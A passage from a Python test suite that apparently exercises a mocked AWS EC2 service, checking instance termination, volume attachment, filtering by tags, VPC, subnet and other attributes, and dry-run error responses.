instance.state.should.equal(""terminated"")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
""DeviceName"": ""/dev/sda1"",
""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
""DeviceName"": ""/dev/sda1"",
""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal(""available"")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},
{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response[""State""].should.equal(""detaching"")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device=""/dev/sdf"")
ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"")
ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)
ex.value.response[""Error""][""Message""].should.equal(
""The volume {0} is not attached to instance {1} as device {2}"".format(
volume.volume_id, instance.instance_id, ""/dev/sdf""
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time(""2014-01-01 05:00:00"")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, ""/dev/sda1"")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, ""/dev/sdb1"")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, ""/dev/sdc1"")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
# can do due to freeze_time decorator.
v.attach_data.attach_time.should.equal(instance.launch_time)
# can do due to freeze_time decorator.
v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal(""in-use"")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
# Call get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""])
cm.value.code.should.equal(""InvalidInstanceID.NotFound"")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
resp = client.describe_instances(MaxResults=50)
reservations = resp[""Reservations""]
reservations.should.have.length_of(50)
next_token = resp[""NextToken""]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2[""Reservations""])
reservations.should.have.length_of(100)
assert ""NextToken"" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client(""ec2"", region_name=""us-west-2"")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType=""t2.micro"",
TagSpecifications=[
{
""ResourceType"": ""instance"",
""Tags"": [
{""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""},
{""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""},
],
},
{
""ResourceType"": ""instance"",
""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}],
},
],
)
assert ""Tags"" in instances[""Instances""][0]
len(instances[""Instances""][0][""Tags""]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
[instance2.id], filters={""instance-state-name"": ""running""}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={""instance-state-name"": ""terminated""}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={""not-implemented-filter"": ""foobar""}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={""instance-id"": [instance1.id, instance2.id]}
)
# get_all_reservations should return two
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""})
# get_all_reservations should return instance1,2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={""instance-type"": [""t1.micro"", ""m1.small""]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
filters={""state-reason-code"": ""Client.UserInitiatedShutdown""}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={""state-reason-code"": """"})
# get_all_reservations should return instance 3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute=""sourceDestCheck"", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={""source-dest-check"": ""false""}
)
source_dest_check_true = conn.get_all_reservations(
filters={""source-dest-check"": ""true""}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc1 = conn.create_vpc(""10.0.0.0/16"")
subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc(""10.1.0.0/16"")
subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
instance = reservation.instances
reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""
)
reservations = client.describe_instances(
Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client(""ec2"", region_name=""us-west-2"")
conn = boto3.resource(""ec2"", ""us-west-2"")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""
)
reservations = client.describe_instances(
Filters=[
{
""Name"": ""network-interface.private-dns-name"",
""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""],
}
]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client(""ec2"", region_name=""us-east-1"")
client.create_security_group(Description=""test"", GroupName=""test_sg"")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]
)
reservations = client.describe_instances(
Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
create_sg = client.create_security_group(Description=""test"", GroupName=""test_sg"")
group_id = create_sg[""GroupId""]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]
)
reservations = client.describe_instances(
Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")
subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")
resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}]
)[""Reservations""]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"", ""value1"")
instance1.add_tag(""tag2"", ""value2"")
instance2.add_tag(""tag1"", ""value1"")
instance2.add_tag(""tag2"", ""wrong value"")
instance3.add_tag(""tag2"", ""value2"")
reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"", ""value1"")
instance1.add_tag(""tag2"", ""value2"")
instance2.add_tag(""tag1"", ""value1"")
instance2.add_tag(""tag2"", ""wrong value"")
instance3.add_tag(""tag2"", ""value2"")
reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={""tag-value"": [""value2"", ""value1""]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"")
instance1.add_tag(""tag2"")
instance2.add_tag(""tag1"")
instance2.add_tag(""tag2X"")
instance3.add_tag(""tag3"")
reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set""
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal(""stopping"")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set""
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal(""pending"")
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set""
)
instance.reboot()
instance.state.should.equal(""pending"")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""instanceType"", ""m1.small"")
instance_attribute = instance.get_attribute(""instanceType"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""instanceType"").should.equal(""m1.small"")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
""test security group"", ""this is a test security group""
).id
sg_id2 = conn.create_security_group(
""test security group 2"", ""this is a test security group 2""
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""groupSet"", [sg_id, sg_id2])
instance_attribute = instance.get_attribute(""groupSet"")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get(""groupSet"")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""userData"", ""this is my user data"")
instance_attribute = instance.get_attribute(""userData"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""userData"").should.equal(""this is my user data"")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal(""true"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""sourceDestCheck"", False, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""sourceDestCheck"", False)
instance.update()
instance.sourceDestCheck.should.equal(""false"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(False)
# Set back to true
instance.modify_attribute(""sourceDestCheck"", True)
instance.update()
instance.sourceDestCheck.should.equal(""true"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b""some user data""
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute(""userData"")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b""some user data"")
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group(""group1"", ""some description"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set""
)
group = conn.create_security_group(""group1"", ""some description"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal(""group1"")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
group = conn.create_security_group(""group1"", ""some description"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal(""group1"")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")
instance = reservation.instances[0]
instance.instance_type.should.equal(""t1.micro"")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region(""us-east-1"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal(""us-east-1a"")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"")
instance = reservation.instances[0]
instance.placement.should.equal(""us-east-1b"")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client(""ec2"", region_name=""eu-central-1"")
ip_networks = [
(ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")),
(
ipaddress.ip_network(""192.168.42.0/24""),
ipaddress.ip_network(""192.168.42.0/25""),
),
]
# Tests instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy=""default"",
)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp[""Instances""][0]
instance[""SubnetId""].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""]))
subnet_cidr.should.contain(priv_ipv4)
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client(""ec2"", region_name=""eu-central-1"")
vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")
subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy=""default"",
)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress=""127.0.0.1"",
)
instance = resp[""Instances""][0]
